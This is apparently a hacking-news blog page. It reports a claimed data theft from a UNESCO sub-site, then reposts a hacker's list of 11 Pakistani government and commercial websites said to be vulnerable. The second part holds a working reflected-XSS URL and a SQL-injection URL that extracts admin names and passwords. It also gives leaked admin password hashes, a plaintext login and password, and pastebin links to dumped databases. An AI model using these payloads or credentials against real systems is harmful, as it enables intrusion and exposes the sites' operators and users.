United Nations Educational, Scientific and Cultural Organization widely known as UNESCO faced hacker attack. A young Indian hacker code named 'Xception Code' targeted UNESCO World Heritage Centre, which is one of the sub-domain of UNESCO. Like his earlier attack, this time also he did not deface or infected the website. But definitely the hacker have stolen sensitive information from the website. As per resources Xception Code managed to get access into the UNESCO web-server and exposed credentials like DNS server information, ns records, database information (tables, columns, user names, user id) and so on. In a post in pastebin the hacker made all the stolen information available. But he did not exposed any passwords, though he claimed to have access in several user-id, administrative passwords and even root password. In his message the hacker said - "Hello, Admin ( I Know You Have Multiple Admins,Because I Have Their Password :D Yes , I Have All Information That Contains Root Password / User Accounts / All Mail Ids Used By Unesco & ALl Info. But, I Am Not Releasing Them. This Is Just A Warning For Unesco, To Patch Their Website/Server...." 
With this news, we also like to remind you that in the middle of this year this hacker has hacked another high profile website, that is National Radio Astronomy Observatory (NRAO). That time also he exposed sensitive information. 

  


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

11 High Profile Websites of Pakistan is Vulnerable Said Zero, He also Exposed DB and Credentials

11 High Profile Websites of Pakistan is Vulnerable Said Zero, He also Exposed Data Base and Credentials of Admins.


List Of Vulnerable Sites:- 


http://www.awt.com.pk/
http://www.unapakistan.org.pk/
www.psf.gov.pk
www.commerce.gov.pk
http://www.whatmobile.com.pk/
http://www.competitiveness.org.pk/
http://www.whatmobile.com.pk/
http://www.smeda.org.pk/
http://www.shifa.com.pk/
http://www.gallup.com.pk/ 
http://www.onlinenews.com.pk/
www.phonebook.com.pk


Here are the details of those Sites:- 


1) Army welfare trust of Pakistan Hacked by zero





Hacked website :-
http://www.awt.com.pk/news_detail.php?news_id=9
Mirror link:-
http://mirror.sec-t.net/defacements/?id=44797




2) XSS Vulnerablity in United Nations Association of Pakistan 



link:-


http://www.unapakistan.org.pk/search.php?search=%3E%22%3E%3Cscript%3Ealert%28%22ZERO%20WAS%20HERE%22%29%3C/script%3E&section=Whole+Site&x=24&y=1


3) Pakistan Science foundation is vul to sql-i 


Data Base:-
http://pastebin.com/XCtn8Ksw


4) government of pakistan Ministry of Commerce is vulnerable to sql-i 
admin $P$BCr2kHTn8oXYjZ.z2AabI56aSgo7gs.
khushnaam $P$BtJsGbrR1l0.IYsv9a1tJhwkjMMYO/.


Data Base:-
http://pastebin.com/WKwP68HC


5) civildefence of pakistan vul to sqli found by zero
Data Base:-
http://pastebin.com/HsXvQAGA


6) http://www.shifa.com.pk/ is vulnerable to sql-i 


Data Base:-
http://pastebin.com/8r2vqqYF


7) http://www.smeda.org.pk/ is vulnerable to sql-i 
Database:-
http://pastebin.com/7Xukb7cH


8) http://www.gallup.com.pk/ vulnerable to sql-i 

Data Base:-
http://pastebin.com/3vNLAmry


9) http://www.onlinenews.com.pk/ vulnerable to sql-i 
3e8edbe7d481ca8ba452ae92631a905e admin
4bc2cfed02b6bebf99b6646c82cec3b8 admin
Data Base:-
http://pastebin.com/y7Vt0zSC


10) http://www.whatmobile.com.pk/ vulnerable to sql-i 



user: aamir
pass:NoMoreBullShit81
Data Base:-
http://pastebin.com/TzTMjKYK


11) http://www.competitiveness.org.pk/ vulnerable to sql-i 


Vulnerable Link:-


http://www.competitiveness.org.pk/subpage.php?pageid=-21+union+select+1,concat%28admin_name,0x3a,admin_password%29,3,4,5,6,7,8,9+FROM+tbl_admin--















SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...